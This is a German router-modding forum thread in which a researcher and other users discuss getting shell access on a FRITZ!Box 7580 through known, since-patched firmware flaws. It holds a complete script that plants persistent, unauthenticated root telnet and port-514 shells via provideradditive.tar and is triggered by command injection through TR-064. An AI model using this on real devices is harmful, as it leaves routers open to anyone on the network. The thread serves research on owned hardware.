.titleBar { margin-bottom: 5px!important; }

[Info] FRITZ!Box 7580 ohne Shell-Zugang ... was nun?

Dieses Thema im Forum "FRITZ!Box Fon: Modifikationen" wurde erstellt von PeterPawn, 17 März 2017.

  1. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    #1 PeterPawn, 17 März 2017
    Zuletzt bearbeitet: 17 März 2017
    Nachdem hier bei mir eine 7580 (1&1) mit Firmware 06.54 eintrudelte, stand ich vor der Frage, wie ich auf diesem Gerät zu meinem ersten Shell-Zugang gelangen könnte.

    Es gibt zwar die Möglichkeit, sich eine interne Version von AVM (inkl. ShellInABox und Telnet-Service) zu besorgen und diese als Update zu installieren ... das widerstrebt mir aber, weil ich einen solchen Zugang immer über den kleinstmöglichen Eingriff in das originale Gerät erhalten will, um soviel wie möglich vom ursprünglichen Zustand des Gerätes zu konservieren. Da ist die Installation einer neuen Firmware nun nicht gerade ein Eingriff, der zu dieser Intention passen würde.

    Der Weg über das Ändern der "/etc/inittab" in einer yaffs2-Partition, wie er bei den VR9-Modellen i.d.R. machbar ist (so arbeitete ja "modfs-Starter"), fällt bei der 7580 und der 7560 ebenfalls aus, da diese Modelle eben keine solche Partition verwenden - dort kommt direkt ein SquashFS-Image auf dem UBI-Layer für den NAND-Flash zum Einsatz. Dieser Weg ist bei den anderen (VR9-)Modellen mit Wrapper-Partition zwar auch nicht "ganz sauber", wenn man streng nach Forensik-Regeln vorgehen will, aber zumindest kann man mit Retten alter Inhalte des yaffs2-Dateisystems die Beeinträchtigungen des Untersuchungsgegenstandes in Grenzen halten. Aber wie gesagt ... das funktioniert bei der 7580 so nicht.

    Aber wie bei anderen Modellen mit NAS-Funktion gibt es natürlich auch hier die Möglichkeit, sich auf einem USB-Speicher ein entsprechendes Skript vorzubereiten und dann muß man nur noch die Frage klären (das machen wir im Anschluß), wie man die Ausführung dieses Skripts nun anstoßen könnte.

    Widmen wir uns erst einmal der Frage, was es für die Installation eines Shell-Zugangs (mit kleinstmöglichem Aufwand, also ohne großes Nachladen von Binaries) braucht ... da ist ja schon seit langem bekannt, daß seitens AVM der Zugriff auf das "telnetd"-Applet der BusyBox nur durch eine zusätzliche Abfrage, ob "/usr/sbin/telnetd" existiert und ein symbolischer Link ist (wohin, ist sogar egal), verhindert wird. Hier hilft also wieder das alte Spiel, die paar Dateien in "/usr/sbin" komplett an eine beschreibbare Stelle im "tmpfs" zu kopieren und dann dieses Verzeichnis mittels der "bind"-Option über das ursprüingliche Verzeichnis "/usr/sbin" zu mounten. In dem damit nun beschreibbaren Verzeichnis kann man dann den notwendigen Symlink anlegen und dann muß man sich nur noch überlegen, auf welchem Weg man den "telnet"-Daemon nun gerne starten möchte. Dafür bietet sich zwar der passende Telefon-Code (#96*7*) auch an, aber es geht auch anders und so nutze ich hier einfach mal einen solchen anderen Weg.

    Eine andere Herausforderung ist es, eine Änderung so herbeizuführen, daß diese auch nach einem Neustart der Box noch greift - u.a. auch deshalb, weil einige der möglichen RCE-Lücken (über die man das Skript dann aufrufen kann) erst im Rahmen des Neustarts der Box aufgerufen werden oder die benutzten Funktionen ihrerseits einen solchen Neustart nach sich ziehen.

    Daher greife ich hier wieder auf eine bereits bekannte Lücke (die in der 06.54 noch existiert) zurück und benutze die "provideraddtive.tar" zum Start eines Telnet-Services nach jedem Neustart. Zuvor habe ich mich natürlich vergewissert, daß die verwendete FRITZ!Box nicht bereits eine "provideradditive.tar" enthält - ansonsten könnte man diese auch über die "erweiterten Support-Daten" vorher extrahieren oder sogar im Skript zuvor noch gesondert sichern (auf dem verwendeten USB-Stick), bevor man sie überschreiben läßt.

    Das "fertige" Skript zum Kopieren auf den USB-Stick sieht dann so aus (im Anhang gibt es das auch noch ohne Zeilennummern, die hier nur zur besseren Orientierung enthalten sind):
    Code:
      1 mkdir /var/pad
      2 cd /var/pad
      3 cat >/var/start_telnet <<'EOT'
      4 umount /usr/sbin 2>/dev/null
      5 rm -r /var/usrsbin 2>/dev/null
      6 cp -a /usr/sbin /var/usrsbin
      7 mount /var/usrsbin /usr/sbin -o bind
      8 ln -s ../../bin/busybox /usr/sbin/telnetd
      9 sed -e '/^23 /d' -e '$a23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K' /var/tmp/inetd.conf >/var/tmp/inetd.conf.new && mv /var/tmp/inetd.conf.new /var/tmp/inetd.conf && kill -HUP $(pidof inetd)
     10 echo "Telnet support initialized"
     11 EOT
     12 mv /var/tmp/inetd.conf /var/inetd.conf.bak
     13 cat >/var/tmp/inetd.conf <<'EOT'
     14 23 stream tcp6 nowait root /bin/sh sh /var/start_telnet
     15 514 stream tcp6 nowait root /bin/sh sh
     16 EOT
     17 ln -s /var v
     18 mknod node c $(sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices) 29
     19 tar -c -O v v/start_telnet v/tmp/inetd.conf >node
     20 mv /var/inetd.conf.bak /var/tmp/inetd.conf
     21 cd /
     22 rm -r /var/pad
    
    Was passiert da nun genau?

    In den Zeilen 1 und 2 wird ein Verzeichnis im beschreibbaren Speicher der FRITZ!Box angelegt und in dieses gewechselt. Von Zeile 3 bis 11 wird eine Datei "/var/start_telnet" erzeugt, die später Bestandteil der "provideradditive.tar" werden soll. Analoges erfolgt in den Zeilen 13 bis 16 für eine neue Datei "/var/tmp/inetd.conf", nachdem zuvor in Zeile 12 die existierende Datei gesichert wurde. Nachdem nun diese beiden Dateien existieren, wird in Zeile 17 ein Symlink für das "/var"-Verzeichnis erzeugt, der zusammen mit den beiden erzeugten Dateien in ein "tar"-Archiv verpackt wird, welches dann gleich in den richtigen TFFS-Node für die "provideradditive.tar" geschrieben wird. Das erfolgt in Zeile 19, nachdem dieser Node zuvor in Zeile 18 angelegt wurde. Anschließend wird noch die zuvor gesicherte Kopie der "inetd.conf" restauriert und das in Zeile 1 angelegte Verzeichnis wieder entfernt. Damit steht an dieser Stelle jetzt in der "provideradditive.tar" ein Archiv, welches beim Auspacken durch die AVM-Komponenten die Dateien "/var/start_telnet" und "/var/tmp/inetd.conf" erzeugt.

    Das erfolgt dann unmittelbar beim nächsten Start des Systems und dann enthält die "inetd.conf" des Systems zunächst zwei zusätzliche Einträge, die beim Herstellen einer TCP-Verbindung auf Port 23 (das ist der Telnet-Port) oder auf Port 514 (das ist "rexec" bzw. "rcmd" und hier wird einfach eine Shell aufgerufen, die das Kommando auf STDIN ausführt und den Inhalt von STDOUT über das Netzwerk ausgibt) die Ausführung eigener Kommandos ermöglichen. Allerdings führt so ein Eintrag in der "inetd.conf" ja noch nicht zur Ausführung des dort angegebenen Kommandos ... dazu braucht es erst die eingehende TCP-Verbindung. Daher steht direkt nach dem Auspacken aus der "provideradditive.tar" für den Telnet-Service auch noch die Ausführung der Datei "/var/start_telnet" in der "inetd.conf" ... damit wird diese Datei beim ersten Verbindungsversuch gestartet. Diese führt dann die weiter oben erwähnten Aktionen aus (Kopieren des Inhalts von "/usr/sbin", Mounten des Verzeichnisses und Anlegen des Symlinks für "telnetd") und ändert anschließend den Eintrag für Port 23 dahingehend ab, daß dort direkt ein Telnet-Daemon mit einer Shell ohne jede Notwendigkeit einer Anmeldung (damit auch ohne Ausführung der "/etc/profile" und ohne Setzen des "Vom Hersteller nicht unterstützte Änderungen"-Flags) gestartet wird, bevor zuletzt noch der "inetd"-Service zum neuen Einlesen seiner Konfiguration überredet wird und für diesen ersten Verbindungsversuch die Nachricht "Telnet support initialized" zum Aufrufer geschickt wird.

    Beim nächsten Aufruf eines Telnet-Clients wird dann ganz normal der Telnet-Dienst verwendet ... das ist (gerade beim Editieren von Kommandos) um einiges komfortabler als die Verwendung von "rexec" auf Port 514.

    Bleibt also noch die Aufgabenstellung, dieses Skript (nachdem es auf den USB-Stick kopiert wurde) irgendwie aufzurufen ... dafür bietet sich z.B. diese Lücke an, bei der das auszuführende Kommando (in der Form "/bin/sh /var/media/ftp/usb_volume/script_name", was dann auch gleich noch das "noexec"-Flag umgeht - logischerweise an die eigenen Gegebenheiten angepaßt) in das Kennwort für den automatischen Export der Einstellungen eingebettet wird. Eine andere Alternative ist diese Lücke, bei der das auszuführende Kommando in der URL für den Download einer neuen Firmware eingebettet wird. Diese Lücke ist von AVM in der 06.83 nunmehr auch gefixt ... daher (und weil sie ohnehin nur per TR-069 (das müßte ich erst noch einmal ausführlich testen) und TR-064 ausgenutzt werden kann) spricht nichts dagegen, dafür ein passendes PowerShell-Skript zu veröffentlichen (die Policy besagt ja, nach 90 Tagen oder nach der Veröffentlichung einer korrigierten Version durch den betroffenen Hersteller).

    Beide Lücken ziehen aber einen Neustart nach sich (sofern man den nicht abbricht, was aber wegen des zuvor erfolgten Aufrufs von "prepare_fwupgrade" wieder einen Heidenaufwand nach sich ziehen würde) und daher eignen sie sich wirklich nur für Kommandos, die ihrerseits eine (zumindest semi-)permanente Änderung herbeiführen, die auch nach dem Neustart noch greift.

    Jedenfalls kann man dann nach dem Neustart im zweiten Verbindungsversuch problemlos eine Telnet-Session benutzen und sich die FRITZ!Box näher ansehen ... und das alles mit nur sehr marginalen Änderungen an der Firmware (praktisch wurde nur die "provideradditive.tar" hinzugefügt), die den Gegenstand der Untersuchung eben auch nur minimal verändern (anders als es eine neue Firmware mit einem Shell-Zugang machen würde - die braucht ja dann den Platz in ihrer Partition und überschreibt dort ggf. schon liegende Daten).
     

    Anhänge:

  2. Shirocco88

    Shirocco88 Aktives Mitglied

    Registriert seit:
    4 Jan. 2016
    Beiträge:
    870
    Zustimmungen:
    66
    Punkte für Erfolge:
    28
    @PeterPawn: Danke fuer die Recherchetätigkeit!


    IMHO: ist die Provideradditive-Lücke https://github.com/PeterPawn/YourFritz/tree/master/reported_threats/480894
    nicht für FW-Version, die nach dem 23.11.2016 veröffentlicht wurden gefixt ?
    d.h. dann wäre nach FW-Update auf FW 06.83 der Telnet-Zugang weg ?
     
  3. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Diese Lücke (#480894) sollte tatsächlich geschlossen sein ... es ging hier auch eher darum zu zeigen, wie man (mit wirklich nur geringen Änderungen an der Box) erst einmal den "initialen" Shell-Zugang erlangen kann (deshalb auch in der "Einführung" der Vergleich mit "modfs-Starter"). Für eine dauerhafte Lösung wäre dann wieder "modfs" (das kommt in Kürze auch wirklich für die 7580/7560) eine denkbare Lösung.

    Es ist halt eine andere "Aufgabenstellung" ... ob man/ich ein Gerät von Beginn an nach Herzenslust verändern kann/darf oder ob das etwas mehr "piano" erfolgen soll, damit man den vorhergehenden Zustand wiederherstellen kann, macht hier den Unterschied aus. Mit dem über die "provideradditive.tar" eingerichteten (dauerhaften) Shell-Zugang bei der 06.54 kann man dann eben "weiter arbeiten" ... wobei ich noch gar nicht getestet habe, ob #480894 bei der 06.80 für die 7580 tatsächlich bereits gefixt war, aber der "Optik" nach ist das tatsächlich der Fall:
    Code:
    provider_additive/ar7.cfg
    cat %s | tar xf - %s %s %s %s %s %s %s
    provider_additive/startinfo.txt
    provider_additive/desc.txt
    provider_additive/vpn.cfg
    provider_additive/user.cfg
    provider_additive/tr069.cfg
    provider_additive/voip.cfg
    
    Da werden nur noch einzelne Dateien extrahiert und nicht mehr einfach alles und erst recht kein Symlink für ein anderes Verzeichnis mehr, weil auch "provider_additive" als Verzeichnis nicht gesondert extrahiert wird.

    Bis zur 06.83 gibt es dann wieder #982308 - man kann ja auch (wie das früher beim "Pseudo-Image" für den Telnet-Zugang praktiziert wurde, nachdem AVM da den Neustart in "firmwarecfg" schon fest verdrahtet hatte) den fälligen Neustart nach dem Versuch des Ladens einer neuen Firmware abbrechen und die (notwendigen) Services selbst wieder starten ... auch das ist noch kein Eingriff, der das installierte System verändert bzw. hier wird sogar die Änderung der Einstellungen (im TFFS) auch noch vermieden. Aus diesem Grund würde ich auch zum Aufruf eines Kommandos jederzeit #982308 ggü. #796851 präferieren, weil letzterer zusätzlich die Änderung des hinterlegten Kennworts für den Export der Einstellungen erfordert.

    Es wird sicherlich in der Zukunft auch weiterhin immer schwieriger werden, dort einfach eigene Kommandos über irgendwelche Lücken einzuschleusen (zum Glück und letzten Endes ist das ja auch das erklärte Ziel) ... inzwischen habe ich auch schon meine Schwierigkeiten, weitere offensichtliche Lücken zu finden (wenn AVM nicht neue dazubaut, was bei #796851 praktisch der Fall war).

    Daher hat sich die Suche nach weiteren Schwachstellen inzwischen von den (Shell-)Skript-Dateien und Binaries im Dateisystem bzw. den Lua-Dateien für das GUI auf die von AVM bereitgestellten Schnittstellen verlagert (#982308 war eine - wiedergefundene(!) - Lücke, die bei der Suche in den TR-064-Interfaces auffiel) und erst wenn ich da nichts mehr finden kann (einige frühere Fundstellen, die ich immer "bei Gelegenheit" mal untersuchen wollte, hat AVM durch die recht konsequente Umstellung von "system"- auf "execXX"-Aufrufe auch selbst entschärft - aber das muß man dann eben auch erst noch austesten, wenn man sichergehen will), widme ich mich dem WLAN-, Telefonie- und dem AHA-Teil der Firmware - ich verwette meine Tastatur, daß sich auch da noch mindestens eine Lücke finden läßt. ;-)
     
  4. Shirocco88

    Shirocco88 Aktives Mitglied

    Registriert seit:
    4 Jan. 2016
    Beiträge:
    870
    Zustimmungen:
    66
    Punkte für Erfolge:
    28
    @PeterPawn: Thanks for explaining #3

    als Fan des "verstehenden Lesen" bin ich auf folgende Fragestellung gestossen:


    Code:
     13 cat >/var/tmp/inetd.conf <<'EOT'
     14 23 stream tcp6 nowait root /bin/sh sh /var/start_telnet
     15 514 stream tcp6 nowait root /bin/sh sh
     16 EOT
     17 ln -s /var v
     18 mknod node c $(sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices) 29
     19 tar -c -O v v/start_telnet v/tmp/inetd.conf >node
    

    provideradditive.tar und inetd.conf:
    IMHO: für mich sieht es so aus, dass die Datei /var/tmp/inted.conf beim FB-Starten durch das Auspacken der provideradditive.tar ersetzt wird.
    Nun frage ich mich, was passiert wenn die /var/tmp/inetd.conf schon NAS-Dienste (FTP, Samba) enthält, die zu starten sind ?

    Beispiel:
    Code:
    # cat /var/tmp/inetd.conf
    21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
    21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
    139 stream tcp6 nowait root /sbin/smbd smbd
    445 stream tcp6 nowait root /sbin/smbd smbd
    #
    
    
    
    
    # ls -la /etc/inetd.conf
    lrwxrwxrwx    1 root     root            21 Mar 12 15:26 /etc/inetd.conf -> ../var/tmp/inetd.conf
    #
    

    werden die drei Zeilen für Port 21, 139, 445 während des Bootens nach dem Overwrite durch die provideradditive.tar noch hinzugefügt, z.B. durch RC-Skripte ?
    oder sind dies NAS-Funktionen nicht mehr nutzbar ?
    Habe keine FB7580 im Besitz, daher kann ich nicht selbst Testen;
     
  5. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Ist bei allen Boxen dasselbe ... die Verarbeitung der "provideradditive.tar" erfolgt recht früh beim Systemstart und die NAS-Dienste in der "inetd.conf" werden erst später (ggf. auch mehrfach, z.B. bei "hotplug/storage") hinzugefügt (die "inetd.conf" bei AVM in der "var.tar" ist i.d.R. leer und dient nur als Platzhalter).

    Weil das bei AVM (zumindest bisher) in der "/bin/inetdctl" mit "grep -v" und "echo" (im Append-Modus) arbeitet, ist eben das einfache "Injizieren" eigener Services auf diesem Wege möglich.

    Wenn AVM hier tatsächlich anhand anderer Flags auswerten würde, welche Dienste jeweils zur Verfügung stehen sollen und die neue "inetd.conf" auf dieser Basis "from scratch" generieren würde, dann wäre dieser Weg (der ja auch für Angreifer zur Verfügung steht und wenn die eine Weiterleitung auf die Box einrichten können, sogar von extern) auch endlich versperrt.
     
  6. Pokemon20021

    Pokemon20021 Mitglied

    Registriert seit:
    9 Aug. 2016
    Beiträge:
    604
    Zustimmungen:
    7
    Punkte für Erfolge:
    18
    @PeterPawn: Habe ich etwas übersehen oder gibt es einen Grund warum hier der Telnetd ohne Authentifizierung configuriert wird ?

    Spricht was dagegen statt "23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K"
    die Anmeldung per ar7login zu verwenden, d.h. "23 stream tcp6 nowait root /bin/busybox telnetd -l /sbin/ar7login -i" in die /var/tmp/inetd.conf zu verwenden ?
     
  7. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Das siehst Du vollkommen richtig ... ich habe das oben aber auch "angerissen". Es ist ja nicht als dauerhafte Lösung gedacht, sondern als "Einstieg" in eine Shell-Session bei einer 7580 mit der derzeit ausgelieferten Firmware. Damit soll das gar nicht längerfristig auf der Box aktiv bleiben oder eine solche Box gar "unbeaufsichtigt" im LAN ihrer Arbeit nachgehen.

    Damit hat dann der direkte Aufruf von "/bin/sh" den Nachteil, daß es kein explizites Benutzerkonto gibt (es wird das vom Daemon bzw. in der "inetd.conf" angegebene "vererbt") und auch kein Login, was dann erst zur Abarbeitung der "/etc/profile" führen würde.

    Gleichzeitig hat er aber auch den Vorteil, daß die ansonsten vom "/sbin/ar7login" gesetzten Flags nicht angefaßt werden ... auch als "Demonstration", daß eben nicht jeder Shell-Zugang sofort die Warnlampen im FRITZ!OS angehen läßt, auch wenn man die mit dem Stein "clear_id" ja wieder auswerfen könnte.

    Die Verwendung von "/bin/login" (als BusyBox-Applet ist das ja auch meist vorhanden) bräuchte dann wieder die passenden Einträge in der "/etc/passwd" bzw. "/etc/shadow" und die brauchen dann wieder zusätzliche Vorbereitungen - daher ist der direkte Aufruf von "/bin/sh" eben bequemer ... wobei das ausdrücklich nichts für eine dauerhafte Lösung ist (habe ich aber weiter oben im Thread auch schon betont, wenn ich mich richtig erinnere).
     
  8. Pokemon20021

    Pokemon20021 Mitglied

    Registriert seit:
    9 Aug. 2016
    Beiträge:
    604
    Zustimmungen:
    7
    Punkte für Erfolge:
    18
    Ist der telnetd auf das "lan"-Interface begrenzt ?
    oder "lauscht" dieser Prozess auf allen Interfaces (guest, wan) bzw. auf allen IP-Adressen auf Port 23/tcp ?

    https://github.com/PeterPawn/YourFritz/tree/master/reported_threats/480894
    wie kann ich mir dies erklären, dass UDP-Ports geshared werden können ?
    zwei Zeilen, die den gleichen Port bzw. das gleiche Programm referenzieren ? welchen Nutzwert soll das haben ?
     
  9. koyaanisqatsi

    koyaanisqatsi IPPF-Urgestein

    Registriert seit:
    24 Jan. 2013
    Beiträge:
    11,035
    Zustimmungen:
    168
    Punkte für Erfolge:
    63
    #9 koyaanisqatsi, 20 März 2017
    Zuletzt bearbeitet: 20 März 2017
    Moin



    Grund Individualisierung
    Ausserdem kann eine eigene busybox ash wesentlich komfortabler sein, als die von AVM.
    1. .ash_history :cool:
    2. Lustige Escape Codes für farbige Textausgaben ala...
    Code:
    for i in 1 2 3 4 5 6;do echo -ne "\e[1;3${i}m${i}\e[0m";done
    :rolleyes:
    3. Braucht natürlich auch nicht Port: 23
    4. Wie wärs mal mit: 23232 :?:
     
  10. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    @Pokemon20021:
    So für sich macht das wenig bis keinen Sinn ... man kann aber noch "Linux Socket Filtering" verwenden, um eingehende Daten gezielt einem Listener zuzuordnen, wenn auf einem Port mehrere solcher Socket-Descriptoren geöffnet sind und meine Bemerkung begann ja eigentlich auch mit "if no other daemon is using the port". Die Ergänzung mit der Möglichkeit des Sharings von UDP-Ports war mehr "der Vollständigkeit halber", damit niemand mit dem Verweis auf die Möglichkeiten von "SO_REUSE..." dann schreit: "Stimmt nicht." - ob das mit dem vorhandenen "inetd" tatsächlich geht, weiß ich nicht genau und müßte ich auch erst testen; hier ging es mehr um die theoretische Machbarkeit.

    Mit den "SO_REUSE{ADDR,PORT}"-Optionen für eine solche Socket-Verbindung kann man eben mehrere Prozesse auf demselben Port und derselben Adresse "lauschen" lassen.

    Ob allerdings der "inetd" der BusyBox tatsächlich eine Socket-Verbindung mit "SO_REUSEPORT" öffnet bzw. öffnen könnte, weiß ich nicht genau (der hat eine ältliche Konfiguration und andere Systeme verwenden i.d.R. den neueren und besser ausgestatteten "xinetd") ... die Bemerkung sollte mehr in die Richtung gehen, daß man z.B. seinen eigenen Prozess noch parallel auf einem Broadcast-Port (z.B. für DHCP) betreiben kann - dort sollten tatsächlich beide Listener dasselbe Paket erhalten (aber hier setzt der "inetd" dann vermutlich das notwendige Flag für den Empfang von Broadcasts wieder nicht, dann würde das auch nicht funktionieren).

    Wobei ich das nicht wirklich umfassend getestet oder im Quellcode untersucht habe ... aber bei der 6490 funktioniert zumindest der Start eines Prozesses über den Port 123 (mit "123 dgram udp6 nowait root /bin/sh /var/start_telnet") für den NTP-Dienst, weil dort der ATOM-Core auf dem ARM-Core entsprechend nachfragt. Ob das jetzt allerdings wirklich parallel zum "chrony"-Prozess erfolgte (der normalerweise auf diesem Port lauschen sollte, wenn er nicht abgeschaltet wurde) oder ob der sich dort dann nicht binden konnte, solange die Zeile in der "inetd.conf" aktiv war, weiß ich nicht mehr genau ... und ich teste es jetzt auch nicht noch einmal. Das war aber der letztendliche Auslöser für diese zusätzliche Bemerkung zum Sharen von UDP-Ports (für TCP funktioniert das m.W. bei keinem "inetd", aber auch das müßte ich erst noch einmal gründlich recherchieren).

    Ansonsten gibt es eigentlich kein "wan"-Interface in einer FRITZ!Box bzw. an dieses Interface können sich keine Programme direkt binden bzw. die AVM-Firewall verhindert auch für "bind everywhere"-Aufrufe von Programmen, daß eingehender Verkehr da "durchgereicht" wird. Wenn man also diesen Telnet-Daemon tatsächlich von außerhalb erreichen wollte, bräuchte es die Portweiterleitung auf der FRITZ!Box auf die eigene (LAN-)Adresse (oder zumindest eine davon) ... das ist schon an sich nicht so ganz einfach, wie wir wissen und seit der 06.80 noch einmal komplizierter zu realisieren. Abgesehen davon ist in diesem Zusammenhang ja die Frage des "login"-Programms dann wieder nebensächlich, weil die Gefahr einer "externen Anmeldung" dann ja auch bei der Verwendung irgendeines Login-Programms anstelle von "/bin/sh" bestünde.
     
  11. berno777

    berno777 Neuer User

    Registriert seit:
    15 Feb. 2015
    Beiträge:
    2
    Zustimmungen:
    0
    Punkte für Erfolge:
    1
    #11 berno777, 15 Apr. 2017
    Zuletzt bearbeitet: 15 Apr. 2017
    Hallo zusammen,

    ich bin seit Februar diesen Jahres Besitzer einer 1&1 FRITZ!Box 7580 und interessierter Mitleser in diesem Forum. Meine Versuche, die Box zu entbranden mussten aufgrund der Thematik des neuen 2017er-Bootloaders bisher leider scheitern.

    Mit einer der von PeterPawn beschriebenen Lücken ist es mir nun zumindest gelungen, einen Shell-Zugang in die Box mit Firmware 6.54 zu erlangen. Nun meine Frage: Gibt es mit dem Telnet-Zugang eine Möglichkeit, das Branding auch mit neuem Bootloader dauerhaft auf AVM umzustellen?

    Wenn nicht, würde ich meine Box gerne als Versuchskaninchen zum Downgrade des Bootloaders anbieten. Ich bin mir sicher dass PeterPawn oder andere versierte Foristen mit ihrem Wissen das Problem lösen könnten. Verständlicherweise hat PeterPawn aber PNs hier deaktiviert. Vielleicht findet sich ja ein Tüftler, der mir bei meinem Vorhaben behilflich sein kann?

    Ich bin für jede Hilfe dankbar.

    Gruß,
    Bernhard
     
  12. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Einfach eine modifizierte Firmware verwenden, die in der "/etc/init.d/rc.conf" die Variable "OEM" nicht anhand der Daten aus dem Environment setzt, sondern fix auf "avm" baut. Das sollte an den meisten Stellen ausreichen ... es wird eigentlich überall die Variable "OEM" später ausgewertet (soweit man das mit "grep" ermitteln kann) und nicht "firmware_version".

    Ich würde das jedenfalls jeder Änderung des Bootloaders vorziehen ... zwar braucht es dann für jedes Firmware-Update wieder passende Vorkehrungen, aber das ist (bei mir zumindest) ja auch noch aus anderen Gründen erforderlich.

    Wer seine Box nicht zu oft neu startet, kann auch direkt am Beginn (theoretisch schon in der "/etc/inittab") einfach bei jedem Start einmal "avm" nach "firmware_version" schreiben - das sollte den anderen Wert "überlagern"; allerdings u.U. auf Kosten eines zusätzlichen TFFS-Schreibzugriffs, wobei das beim NAND-TFFS ohnehin noch einmal anders läuft.
     
  13. pzYsTorM

    pzYsTorM Neuer User

    Registriert seit:
    20 Apr. 2017
    Beiträge:
    7
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Hallo zusammen,
    ich habe nun auch so eine 7580er Box mit 6.81 zurzeit und wollte da auch mal testen, ob man mit der beschriebenen Methode noch einen telnet Zugang bekommt.
    Irgendwie scheint es jedoch nicht zu klappen. Nach dem Ausführen des Powershell-Scripts bootet die Box, danach ist aber weder Port 23 noch Port 514 offen.
    fritz7580.png
    Woher kenne ich denn den Mount-Pfad vom USB-Stick?
    Ist /var/media/ftp/Intenso/invade.sh vielleicht nicht richtig?
    Gibt es sonst noch weitere Möglichkeiten zum Debuggen?

    Danke und Grüße :)
     
  14. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Den Mountpoint des Sticks findet man natürlich jederzeit über die NAS-Funktionen der Box heraus - versieht man eine Partition mit einem vernünftigen Label (und wurde die Box mit einer frischen Konfiguration gestartet), wird auch dieser Volume-Name als Mountpoint verwendet - das gibt dann ein paar Probleme/Unwägbarkeiten, wenn man dort "FRITZ" verwendet oder irgendeinen der anderen vordefinierten Ordner im internen NAS-Speicher.

    Will man wissen, ob die Funktion über TR-064 überhaupt korrekt aufgerufen wurde, erstellt man entweder die Support-Daten zum richtigen Zeitpunkt (man kann so einen Download z.B. dadurch "aufhalten", daß man dort einen externen (zur FRITZ!Box extern!) Server in der URL angibt und die Dateiübertragung in diesem Falle irgendwo mittendrin unterbricht, damit man die Support-Daten mit der aktuellen Prozessliste auslesen lassen kann) oder man macht einfach einen Netzwerk-Mitschnitt und schaut, ob ein entsprechender HTTP-Request für den Download gestartet wird. Enthält die URL dort das eingefügte Kommando, wurde es offensichtlich nicht "ausgeführt", sondern als Literal (also als Text) innerhalb der URL aufgefaßt.
     
  15. pzYsTorM

    pzYsTorM Neuer User

    Registriert seit:
    20 Apr. 2017
    Beiträge:
    7
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Im Linux-Umfeld wird ja Groß/Kleinschreibung unterschieden. Meine Frage bezog sich eher auf diesen Punkt.
    Ist es /var/media/ftp/Intenso/invade.sh ... oder wie es im NAS-Bereich angezeigt wird: INTENSO (also alles in Großbuchstaben)...
    Nichtsdestotrotz: Beide Varianten (
    /var/media/ftp/Intenso/invade.sh und /var/media/ftp/INTENSO/invade.sh) funktionieren nicht.
    Die Box bootet einfach nur und es gibt danach/davor kein Telnet.
    Hast Du noch eine Idee, was ich tun kann?

    Versteh ich Dich richtig, dass Du sagst, ich sollte erstmal statt dem invade.sh Script ein wget auf eine externe URL ausführen lassen und dann über tcpdump am Router gucken, ob die URL tatsächlich aufgerufen wurde?
     
  16. PeterPawn

    PeterPawn IPPF-Urgestein

    Registriert seit:
    10 Mai 2006
    Beiträge:
    11,875
    Zustimmungen:
    677
    Punkte für Erfolge:
    113
    Beruf:
    IT-Freelancer
    Ort:
    Berlin
    Das wäre eine mögliche Lösung um zu sehen, ob und wie das Kommando abgearbeitet wird.

    Ich meinte allerdings mehr den Austausch der kompletten URL (an der Stelle, wo der "Server" benannt wird) für den (angeblichen) Download des neuen Firmware-Images, der (iirc) in meinem PowerShell-Skript über eine URL mit "http://fritz.box/irgendwas" erfolgen soll.

    Ändert man hier das Ziel dieser URL auf etwas, was extern zur FRITZ!Box (auf der LAN-Seite am besten) ist, sollte man dort (also auf dem dann eingetragenen Server) anhand der angefragten URL (also des Pfades im GET-Request) ja auch sehen können, ob das Kommando ausgeführt wurde (dann fehlt es in der URL und wurde durch seine Ausgaben auf STDOUT ersetzt) oder ob es als reiner Text behandelt wurde, denn dann steht es 1:1 in der angeforderten URL.

    Logischerweise verwendet das Linux in der Box eine Unterscheidung zwischen Groß- und Kleinschreibung, aber was die "richtige" Variante für den Verzeichnisnamen nun wäre (wenn man ihn nicht ohnehin gleich durch ein passendes Volume-Label auf etwas setzen lassen will, was man selbst steuern kann), verrät einem ja spätestens der FTP-Zugriff. Wenn da schon ein "INTENSO" als Herstellername "eingebaut" wird, hat das verwendete Volume offenbar kein Label ... das ist aber schnell (an einem anderen Rechner) gesetzt und dann braucht man auch nicht mehr raten bzw. ist nicht einmal davon betroffen, wenn AVM das Bilden des Namens aus Hersteller und Datenträgernummer betreibt und sich dabei (z.B. wegen eines zweiten Sticks) die Gerätenummer ändert.

